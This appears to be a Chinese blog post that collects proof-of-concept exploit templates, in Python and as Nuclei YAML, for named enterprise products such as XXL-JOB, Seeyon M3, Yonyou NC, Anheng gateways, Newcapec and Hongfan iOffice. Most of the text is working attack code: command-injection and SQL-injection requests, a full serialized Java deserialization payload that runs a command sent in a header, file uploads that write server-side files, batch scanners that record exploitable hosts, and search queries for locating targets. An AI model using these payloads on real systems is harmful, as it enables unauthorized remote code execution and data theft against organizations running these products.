poc 收集 书写

已于 2024-08-28 21:54:25 修改
阅读量280 收藏 5
点赞数 4
文章标签: web安全
于 2024-08-28 21:51:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ka_ka11/article/details/141650885
版权

基础知识

判断目标是否存在漏洞

1.执行一个命令,判断返回值

2.dnslog ping成功了,说明存在漏洞

3.有回显的状态 echo 111

4.创建文件 mkdir 1.txt 请求文件 url+/x.x.x/1.txt, 对于单个漏洞 /txt/1.txt

5.延时,对目标系统存在违法,准确性存在疑问

6.反弹shell,没有回显。 bash/certutil/bitamin/powershell, 把你服务器端的exe拉到你的服务器

poc的重点

1.忽略不安全的证书

2.请求方式

使用默认请求头(new HashMap<>(),uri)

GetBody(自定义请求头,uri)

GetBodyParam(自定义请求头,uri,data参数)

PostBodyParam(自定义请求头,uri,请求体参数)

PostJsonParam(自定义请求头,uri,json参数)

dnslog型,需要修改app.java

# 修改参数
String sessionId = Math.random*100+""
String subDomain = RestTemplate.getSubDomain(sessionId)
String uri=localTxt.get(i);
SonarQube.SonarQube_fileread(uri,subDomain);
#确保在ping过程中需要时间
Thread.sleep(500);
# 判断漏洞是否存在
Sting s =RestTemplate.RefreshRecord(sessionId)
if(s!=null){
打印漏洞存在
将漏洞url保存到文件中}

python 模板

import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def Poc(url):
target_url = url + 'payload' #验证存在漏洞的url
# 代理池设置
proxy = {
        'http':'127.0.0.1:812',
        'http':'127.0.0.1:8123'
    }
# 请求头部分构造
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',   #模拟浏览器请求
        'cookie':'xxxxxxxxxxxxxx',   #有些请求需要带上cookie才可以请求到想要的内容
        'Connection':'close'   #关闭多余的连接请求
    }
    data = {"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}   #向url中带入请求的数据
    # 使用try except对异常进行处理
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    #取消SSL验证告警
        response = requests.get(url=target_url,headers=headers,data=data,verify=False,proxies=proxy,timeout=10)   #请求漏洞的url
        if response.status_code == 200:
            result = re.search(r'_____',response.text,re.I)    #使用正则匹配页面请求,下划线处填写正则规则
            print('正在获取结果:{}'.format(result.group(1)))
        else:
            print('请求失败:{}'.format(response.status_code))
    except Exception as e:
        print('请求失败: {}'.format(e))

if __name__ == '__main__':
    url = str(input('请输入检测的url:'))
    Poc(url)

python json 版本

import requests

def Poc(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    url = url + "/run"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',
        'XXL-JOB-ACCESS-TOKEN': 'default_token',
        'Connection': 'close'  # 关闭额外的连接请求
    }
    json_data = {
        "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler",
        "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 1, "logDateTime": 1586629003729,
        "glueType": "GLUE_SHELL", "glueSource": "", "glueUpdatetime": 1586699003758, "broadcastIndex": 0,
        "broadcastTotal": 0
    }

    try:
        response = requests.post(url=url, headers=headers, verify=False, json=json_data, proxies=proxy, timeout=10)
        response.raise_for_status()  # 对于错误响应(4xx和5xx),抛出HTTPError
        if response.status_code == 200 and '{"code":200}' in response.text:
            print(f"{url}一定可以打")
            with open('2.txt', 'a') as output_file:
                output_file.write(url + "\n")
        else:
            print(f"{url}漏洞不存在")
    except requests.exceptions.RequestException as e:
        print(f"{url}访问超时,错误提示:{e}")
        # 可选:记录错误或执行其他操作
        pass

if __name__ == '__main__':
    # 从文件中读取每个URL
    with open('1.txt', 'r') as file:
        for line in file:
            url = line.strip()
            Poc(url)

python get 版本

import requests

def Poc(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    url = url + "/api/get-users?p=123&pageSize=123"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',
        'Connection': 'close'  # 关闭额外的连接请求
    }

    try:
        response = requests.get(url=url, headers=headers, verify=False, timeout=10)
        response.raise_for_status()  # 对于错误响应(4xx和5xx),抛出HTTPError
        if response.status_code == 200 and 'password' in response.text:
            print(f"{url}一定可以打")
            with open('2.txt', 'a') as output_file:
                output_file.write(url + "\n")
        else:
            print(f"{url}漏洞不存在")
    except requests.exceptions.RequestException as e:
        print(f"{url}访问超时,错误提示:{e}")
        # 可选:记录错误或执行其他操作
        pass

if __name__ == '__main__':
    # 从文件中读取每个URL
    with open('1.txt', 'r') as file:
        for line in file:
            url = line.strip()
            Poc(url)

python get 集成版本

#2023-12-06  作者Pings
import requests

requests.urllib3.disable_warnings()

def exp(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    try:
        res = requests.get(url + "/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls",proxies=proxy, verify=False, timeout=10)
        shell_url = url + '/sslvpn/ceshi.txt'
        if 'x /tmp|echo `whoami` |tee /usr/local/webui/sslvpn/ceshi.txt|ls' in res.text:
            print(f'[+]存在漏洞:{shell_url}')
            with open('exp2_ok.txt', 'a') as f:
                f.write(shell_url + '\n')
        print(url+"漏洞不存在")
    except requests.exceptions.Timeout as e:
        print(f'[!]连接超时: {e}')
    except Exception as e:
        print(f'[!]漏洞不存在或发生异常: {e}')


def main():
    with open('url3.txt', 'r') as f:
        resp = f.readlines()
        for url in resp:
            url = url.strip()
            if 'http' not in url:
                url = 'http://' + url
            exp(url)


if __name__ == '__main__':
    main()

python post版本

import requests

def Poc(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    url = url +"/general/reportshop/utils/get_datas.php"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',
        'Connection': 'close'  # 关闭额外的连接请求
    }
    data={'USER_ID': 'OfficeTask',
    'PASSWORD': '',
    'col': '1,1',
    'tab': '5 where 1={`\=\'` 1} union (select uid,sid from user_online where 1\={`=` 1})-- \'1'
}


    try:
        response = requests.post(url=url, headers=headers,data=data,proxies=proxy,verify=False, timeout=10)
        response.raise_for_status()  # 对于错误响应(4xx和5xx),抛出HTTPError
        if response.status_code == 200:
            print(f"{url}一定可以打")
            with open('3.txt', 'a') as output_file:
                output_file.write(url + "\n")
        else:
            print(f"{url}漏洞不存在")
    except requests.exceptions.RequestException as e:
        print(f"{url}访问超时,错误提示:{e}")
        # 可选:记录错误或执行其他操作
        pass

if __name__ == '__main__':
    # 从文件中读取每个URL
    with open('2.txt', 'r') as file:
        for line in file:
            url = line.strip()
            Poc(url)

import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
#app="红帆-ioffice"

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

def get_ua():
	first_num = random.randint(55, 62)
	third_num = random.randint(0, 3200)
	fourth_num = random.randint(0, 140)
	os_type = [
		'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)'
	]
	chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

	ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
				   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
				  )
	return ua

def wirte_targets(vurl, filename):
	with open(filename, "a+") as f:
		f.write(vurl + "\n")

proxies={'http': 'http://127.0.0.1:8080',
		'https': 'https://127.0.0.1:8080'}

def check_url(url):
	url=parse.urlparse(url)
	url='{}://{}'.format(url[0],url[1])
	vulnurl="{}/iOffice/prg/set/wss/udfmr.asmx".format(url)
	headers = {
		'User-Agent': get_ua(),
		'Content-Type': 'text/xml; charset=utf-8',
		'SOAPAction': "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
	}
	data = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
      <condition>1=db_name()</condition>
    </GetEmpSearch>
  </soap:Body>
</soap:Envelope>
	'''
	try:
		res = requests.post(vulnurl, verify=False, allow_redirects=False,proxies=proxies, headers=headers,data=data,timeout=5)
		if 'nvarchar' in res.text:
			print("\033[32m[+]{} is vulnerable\033[0m".format(url))
			wirte_targets(vulnurl,"vuln.txt")
		else:
			print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
	except Exception as e:
		print("\033[34m[!]{} request false.\033[0m".format(url))
		pass


def multithreading(url_list, pools=5):
	works = []
	for i in url_list:
		# works.append((func_params, None))
		works.append(i)
	# print(works)
	pool = threadpool.ThreadPool(pools)
	reqs = threadpool.makeRequests(check_url, works)
	[pool.putRequest(req) for req in reqs]
	pool.wait()


if __name__ == '__main__':
	arg=ArgumentParser(description='check_vulnerabilities By m2')
	arg.add_argument("-u",
						"--url",
						help="Target URL; Example:http://ip:port")
	arg.add_argument("-f",
						"--file",
						help="Target URL; Example:url.txt")
	args=arg.parse_args()
	url=args.url
	filename=args.file
	print("[+]任务开始.....")
	start=time()
	if url != None and filename == None:
		check_url(url)
	elif url == None and filename != None:
		for i in open(filename):
			i=i.replace('\n','')
			url_list.append(i)
		multithreading(url_list,10)
	end=time()
	print('任务完成,用时%ds.' %(end-start))

nuclei 模板

yaml的书写规则

nuclei-templates编写语法(二)_nuclei模板-CSDN博客

模板 一

1.两次请求

2.反序列化

3.匹配方式--dsl 大小匹配

4.反序列化

id: seeyon-m3server-mobile_portal-rce
info:
  name: 致远M3server反序列化RCE漏洞
  author: kaka620
  severity: critical
  description: '致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。'
  tags: 2023,seeyon,m3server,rce
  metadata:
    max-request: 3
    fofa-query: title="M3-Server"
    verified: true

http:
  - raw:
      - |
        POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Content-Type: application/json

        [{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000014afcafebabe0000003301050a004500890a008a008b0a008a008c0a001d008d08007a0a001b008e0a008f00900a008f009107007b0a008a00920800930a002000940800950800960700970800980800580700990a001b009a08009b08007007009c0b0016009d0b0016009e08006708009f0700a00a001b00a10700a20a00a300a40800a50700a60800a70a002000a80800a909002500aa0700ab0a002500ac0800ad0a00ae00af0a002000b00800b10800b20800b30800b40800b50700b60700b70a003000b80a003000b90a00ba00bb0a002f00bc0800bd0a002f00be0a002f00bf0a002000c00800c10a001b00c20a001b00c30800c40700640a001b00c50800c60700c70800c80800c90700ca0701030700cc0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301002c4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700cd0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100204c6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e3b010003636c730100114c6a6176612f6c616e672f436c6173733b010004766172350100214c6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e3b010004636d64730100135b4c6a6176612f6c616e672f537472696e673b010006726573756c740100025b4201000970726f636573736f720100124c6a6176612f6c616e672f4f626a6563743b010003726571010004726573700100016a01000149010001740100124c6a6176612f6c616e672f5468726561643b0100037374720100124c6a6176612f6c616e672f537472696e673b0100036f626a01000a70726f636573736f72730100104c6a6176612f7574696c2f4c6973743b0100154c6a6176612f6c616e672f457863657074696f6e3b01000169010004666c61670100015a01000567726f75700100174c6a6176612f6c616e672f54687265616447726f75703b010001660100194c6a6176612f6c616e672f7265666c6563742f4669656c643b010007746872656164730100135b4c6a6176612f6c616e672f5468726561643b01000d537461636b4d61705461626c650700ce0700cf0700d00700a60700a207009907009c0700620700c70700ca01000a536f7572636546696c65010012546f6d636174436d644563686f2e6a6176610c004600470700d00c00d100d20c00d300d40c00d500d60c00d700d80700cf0c00d900da0c00db00dc0c00dd00de010004657865630c00df00e0010004687474700100067461726765740100126a6176612f6c616e672f52756e6e61626c6501000674686973243001001e6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0c00e100d6010006676c6f62616c01000e6a6176612f7574696c2f4c6973740c00e200e30c00db00e401000b676574526573706f6e736501000f6a6176612f6c616e672f436c6173730c00e500e60100106a6176612f6c616e672f4f626a6563740700e70c00e800e90100096765744865616465720100106a6176612f6c616e672f537472696e67010003636d640c00ea00eb0100097365745374617475730c00ec005e0100116a6176612f6c616e672f496e74656765720c004600ed0100076f732e6e616d650700ee0c00ef00f00c00f100de01000377696e010007636d642e6578650100022f630100092f62696e2f626173680100022d630100116a6176612f7574696c2f5363616e6e65720100186a6176612f6c616e672f50726f636573734275696c6465720c004600f20c00f300f40700f50c00f600f70c004600f80100025c410c00f900fa0c00fb00de0c00fc00fd0100246f72672e6170616368652e746f6d6361742e7574696c2e6275662e427974654368756e6b0c00fe00ff0c0100010101000873657442797465730c010200e6010007646f577269746501001f6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e0100136a6176612e6e696f2e42797465427566666572010004777261700100136a6176612f6c616e672f457863657074696f6e01002a79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100156a6176612f6c616e672f54687265616447726f75700100176a6176612f6c616e672f7265666c6563742f4669656c640100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657454687265616447726f757001001928294c6a6176612f6c616e672f54687265616447726f75703b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000d6765745375706572636c61737301000473697a650100032829490100152849294c6a6176612f6c616e672f4f626a6563743b0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076973456d70747901000328295a01000454595045010004284929560100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f77657243617365010016285b4c6a6176612f6c616e672f537472696e673b2956010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b295601000c75736544656c696d69746572010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f7574696c2f5363616e6e65723b0100046e657874010008676574427974657301000428295b42010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000b6e6577496e7374616e636501001428294c6a6176612f6c616e672f4f626a6563743b0100116765744465636c617265644d6574686f6401003979736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f39383334393531333839303130323301003b4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3938333439353133383930313032333b002100440045000000000004000100460047000100480000002f00010001000000052ab70001b100000002004900000006000100000009004a0000000c000100000005004b010400000001004d004e000200480000003f0000000300000001b100000002004900000006000100000057004a00000020000300000001004b0104000000000001004f0050000100000001005100520002005300000004000100540001004d005500020048000000490000000400000001b10000000200490000000600010000005c004a0000002a000400000001004b0104000000000001004f005000010000000100560057000200000001005800590003005300000004000100540008005a004700010048000005d500080011000002fd033bb80002b600034c2bb600041205b600064d2c04b600072c2bb60008c00009c000094e03360415042dbea202cd2d1504323a051905c70006a702b91905b6000a3a061906120bb6000c9a000d1906120db6000c9a0006a7029b1905b60004120eb600064d2c04b600072c1905b600083a071907c1000f9a0006a702781907b600041210b600064d2c04b600072c1907b600083a071907b600041211b600064da700163a081907b60004b60013b600131211b600064d2c04b600072c1907b600083a071907b60004b600131214b600064da700103a081907b600041214b600064d2c04b600072c1907b600083a071907b600041215b600064d2c04b600072c1907b60008c00016c000163a0803360915091908b900170100a201cb19081509b9001802003a0a190ab600041219b600064d2c04b600072c190ab600083a0b190bb60004121a03bd001bb6001c190b03bd001db6001e3a0c190bb60004121f04bd001b5903122053b6001c190b04bd001d5903122153b6001ec000203a061906c601571906b600229a014f190cb60004122304bd001b5903b2002453b6001c190c04bd001d5903bb0025591100c8b7002653b6001e571227b80028b60029122ab6000c99001906bd00205903122b535904122c535905190653a7001606bd00205903122d535904122e5359051906533a0dbb002f59bb003059190db70031b60032b60033b700341235b60036b60037b600383a0e1239b8003a3a0f190fb6003b3a07190f123c06bd001b5903123d535904b20024535905b2002453b6003e190706bd001d5903190e535904bb00255903b70026535905bb002559190ebeb7002653b6001e57190cb60004123f04bd001b5903190f53b6001c190c04bd001d5903190753b6001e57a7004e3a0f1241b8003a3a101910124204bd001b5903123d53b6003e191004bd001d5903190e53b6001e3a07190cb60004123f04bd001b5903191053b6001c190c04bd001d5903190753b6001e57043b1a990006a70009840901a7fe2f1a990006a70011a700083a05a70003840401a7fd32a700044bb10008009500a000a3001200c300d100d400120213028602890040002e003902ed0043003c005702ed0043005a007a02ed0043007d02e702ed0043000002f802fb004300030049000000fe003f0000000d0002000e0009000f001300100018001100240012002e001400340015003c001600430017005a001800650019006a001a0072001b007d001c0088001d008d001e0095002000a0002300a3002100a5002200b6002400bb002500c3002700d1002a00d4002800d6002900e1002b00e6002c00ee002d00f9002e00fe002f010c0030011b0031012600320131003301360034013e003501570036017d0037018a003801b5003901f0003a0213003c021a003d0221003e0264003f0286004402890040028b00410292004202b2004302d4004502d6004702dd003002e3004902ea004c02ed004a02ef004b02f2001202f8005002fb004f02fc0051004a000000d4001500a50011005b005c000800d6000b005b005c0008021a006c005d005e000f02920042005d005e0010028b0049005f0060000f01f000e600610062000d021300c300630064000e012601b700650066000a013e019f00670066000b0157018600680066000c010f01d40069006a0009003402b6006b006c0005004302a7006d006e000600720278006f00660007010c01de00700071000802ef0003005b00720005002702d10073006a0004000202f6007400750000000902ef007600770001001302e5007800790002002402d4007a007b0003007c000000a80017ff002700050107007d07007e070009010000fc001407007ffc001a07008002fc002207008165070082125d0700820cfd002d07008301fe00cb07008107008107008152070084ff009a000f0107007d07007e0700090107007f0700800700810700830107008107008107008107008407003d0001070085fb004af90001f80006fa0005ff000600050107007d07007e0700090100004207008604ff0005000000004207008600000100870000000200887571007e0010000001d4cafebabe00000033001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d000000060001000000c7000e0000000c000100000005000f001200000002001300000002001400110000000a00010002001600100009707400084448434e57504c53707701007871007e000d78;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

      - |
        GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        cmd: whoami
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains((body_1), 'Success') && status_code_2 == 200 && contains((body_1), '\')"

模板 二

1.文件上传

2.两次请求

id: Anheng-mingyu-wangguan-upload

info:
  name: Anheng-mingyu-wangguan-upload
  author: kaka620
  severity: high
  description: 安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件上传漏洞

requests:
  - raw:
      - |+
        POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../test.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=849978f98abe41119122148e4aa65b1a
        Accept-Encoding: gzip
        Content-Length: 173

        --849978f98abe41119122148e4aa65b1a
        Content-Disposition: form-data; name="123"; filename="test.php"
        Content-Type: text/plain

        This page has a vulnerability
        --849978f98abe41119122148e4aa65b1a--

      - |
        GET /test.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'vulnerability'
      - type: status
        status:
          - 200

模板 三

1.命令执行

id: newcapec-CampusMobileServiceManagementPlatform-RCE
info:
  name: 新开普掌上校园服务管理平台service.action远程命令执行漏洞
  author: kaka620
  severity: high
  description: '新开普掌上校园服务管理平台/service_transport/service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。'
  tags: 2023,xinkaipu,rce
  metadata:
    max-request: 3
    fofa-query: title="掌上校园服务管理平台"
    verified: true

http:
  - raw:
      - |
        POST /service_transport/service.action HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
        
        {
          "command": "GetFZinfo",
          "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
          ?new()>${ex(\"cmd /c echo {{randstr}} >./webapps/ROOT/{{randstr}}.txt\")}"
        }

      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains(body_2, '{{randstr}}')"

模板 四

1.文件上传

2.传递变量

id: yonyou-nc-accept-fileupload

info:
  name: 用友NC accept.jsp任意文件上传漏洞
  author: fgz
  severity: critical
  description: |
    用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
  reference:
    none
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1085941792"
  tags: yonyou,nc,fileupload,2023

variables:
  boundary: '{{rand_base(29)}}'

http:
  - raw:
      - |
        POST /aim/equipmap/accept.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=---------------------------{{boundary}}
        Accept-Encoding: gzip

        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt"
        Content-Type: text/plain

        <% out.println("{{randstr_2}}"); %>
        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="fname"

        \webapps\nc_web\{{randstr_3}}.jsp
        -----------------------------{{boundary}}--
      - |
        GET /{{randstr_3}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

